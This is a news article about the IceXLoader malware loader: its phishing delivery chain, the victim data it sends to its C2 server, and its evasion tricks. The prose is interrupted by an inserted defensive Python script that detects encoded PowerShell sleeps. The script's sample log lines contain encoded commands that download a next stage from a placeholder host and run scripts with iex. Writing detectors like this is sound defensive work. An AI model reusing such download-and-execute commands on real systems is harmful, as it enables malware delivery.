A malware loader that was considered a “work in progress” in June is now fully functional, infecting thousands of corporate and personal Windows PCs.
Version 3 of IceXLoader was discovered this summer by Fortinet’s FortiGuard Labs, which wrote that the malware’s functionality was incomplete and that it appeared to have been ported to the Nim programming language.
However, researchers from Minerva Labs reported on Tuesday that they detected a new iteration of IceXLoader – version 3.3.3 – with a multi-step delivery chain for the nasty code.
IceXLoader gathers system metadata – such as IP address, username and machine name, Windows version, and CPU, GPU and memory information – and sends it to a command and control (C2), according to the researchers.
The malware’s SQLite database file, hosted on the C2 server and continuously updated, “contained thousands of victim records, which contained a mixture of private PCs and company PCs. We started notifying affected companies after the discovery,” the researchers wrote.
IceXLoader was originally sold on the dark web for $118 per lifetime license by a group of developers who also sell other commodity malware and claim to have over 200 customers, FortiGuard wrote. It remains to be seen what the new version will be worth to criminals.
The malware initially enters systems via phishing campaigns. The emails contain a ZIP file which contains a dropper, which drops a .NET based downloader. This malware downloads another dropper which decrypts and injects IceXLoader in a new process.
IceXLoader contacts the C2 server for further commands, and additional malware may then be deployed to the compromised system. According to FortiGuard, version 1.0 of IceXLoader was used to distribute the data-exfiltration malware DCRat, or Dark Crystal RAT (Remote Access Trojan), while version 3.0 distributed a Monero cryptocurrency miner.
IceXLoader has a number of features designed to evade detection, including code obfuscation, a check that stops it running inside the Microsoft Defender emulator, and PowerShell execution with an encrypted command that delays the malware’s run by 35 seconds to outlast sandbox analysis windows.
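The 35-second PowerShell delay is the kind of evasion that shows up in process-creation telemetry rather than on disk, so a detection engineer would hunt for it there. The following is an added example, not code from the article, Minerva Labs or FortiGuard: it decodes PowerShell -EncodedCommand arguments (base64 over UTF-16LE, with the abbreviated switches PowerShell accepts) from constructed process-creation log lines and flags scripts whose longest explicit sleep meets a threshold. The log format, the placeholder URL and the 30-second threshold are assumptions; the exact command line IceXLoader runs is not on the page.

```python
import base64
import re
from typing import Dict, List, Optional

# Assumption: anything sleeping this long before doing work is worth a look.
MIN_SUSPICIOUS_DELAY_S = 30

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...),
# which attackers use to dodge naive "-EncodedCommand" string matches.  Capture the
# switch and the base64 argument that follows it.
_ENC_SWITCH = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")

# Delays written in seconds: Start-Sleep 35, Start-Sleep -s 35, Start-Sleep -Seconds 35, sleep 35
_SLEEP_SECONDS = re.compile(r"(?i)\b(?:start-sleep|sleep)\s+(?:-s(?:econds)?\s+)?(\d+)")
# Delays written in milliseconds: Start-Sleep -Milliseconds N, [Threading.Thread]::Sleep(N)
_SLEEP_MS = re.compile(
    r"(?i)\b(?:start-sleep|sleep)\s+-m(?:illiseconds)?\s+(\d+)|thread\]::sleep\(\s*(\d+)\s*\)"
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command."""
    m = _ENC_SWITCH.search(cmdline)
    if not m:
        return None
    switch, blob = m.group(1).lower(), m.group(2)
    if not (switch == "ec" or "encodedcommand".startswith(switch)):
        return None  # e.g. -ExecutionPolicy, not an encoded command
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def sleep_seconds(script: str) -> float:
    """Longest explicit delay found in a PowerShell script, in seconds."""
    delays = [float(s) for s in _SLEEP_SECONDS.findall(script)]
    for ms_a, ms_b in _SLEEP_MS.findall(script):
        delays.append(int(ms_a or ms_b) / 1000)
    return max(delays, default=0.0)


def scan_process_logs(lines: List[str], threshold: float = MIN_SUSPICIOUS_DELAY_S) -> List[Dict]:
    """Flag log lines whose encoded PowerShell sleeps for at least `threshold` seconds."""
    hits = []
    for line in lines:
        script = decode_encoded_command(line)
        if script is None:
            continue
        delay = sleep_seconds(script)
        if delay >= threshold:
            hits.append({"line": line, "decoded": script, "delay_s": delay})
    return hits


def _enc(ps: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation log lines ("<timestamp> <image> <command line>").
# The URL is a placeholder; none of this is real telemetry.
SAMPLE_LOGS = [
    # loader-style delay, then fetch of a next stage
    "2022-11-08T10:01:02Z powershell.exe -nop -w hidden -enc "
    + _enc("Start-Sleep -Seconds 35; Invoke-WebRequest http://example.invalid/stage2 -OutFile $env:TEMP\\s2.exe"),
    # same delay expressed in milliseconds via .NET, abbreviated switch
    "2022-11-08T10:02:15Z powershell.exe -e "
    + _enc("[Threading.Thread]::Sleep(35000); iex (gc $env:TEMP\\s.ps1 -Raw)"),
    # benign admin script with a short pause: must not fire
    "2022-11-08T10:03:40Z powershell.exe -EncodedCommand "
    + _enc("Start-Sleep -s 2; Get-Service Spooler | Restart-Service"),
    # no encoded command at all
    "2022-11-08T10:04:00Z powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for hit in scan_process_logs(SAMPLE_LOGS):
        print(f"{hit['delay_s']:.0f}s delay: {hit['decoded']}")
```

Decoding before matching matters: the sleep never appears in the raw command line, so a rule that only greps for "Start-Sleep" misses exactly the encoded case the loader uses. Tune the threshold to your sandbox's analysis window rather than the 35 seconds reported here, since the delay is trivially changed between builds.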
It’s part of a larger trend over the past few years of malware developers turning to newer languages like Go, DLang, Nim, and Rust to dodge easy detection.
“The [IceXLoader] developers market their loader as FUD (Fully UnDetected), a term commonly used in malware hacking forums to refer to malware that can bypass antivirus products,” the FortiGuard researchers wrote.
The need to remain undetected likely convinced the malware developers to port IceXLoader from its earlier AutoIt-based releases to Nim for version 3, “since Nim is a relatively rare language for writing applications,” they wrote. ®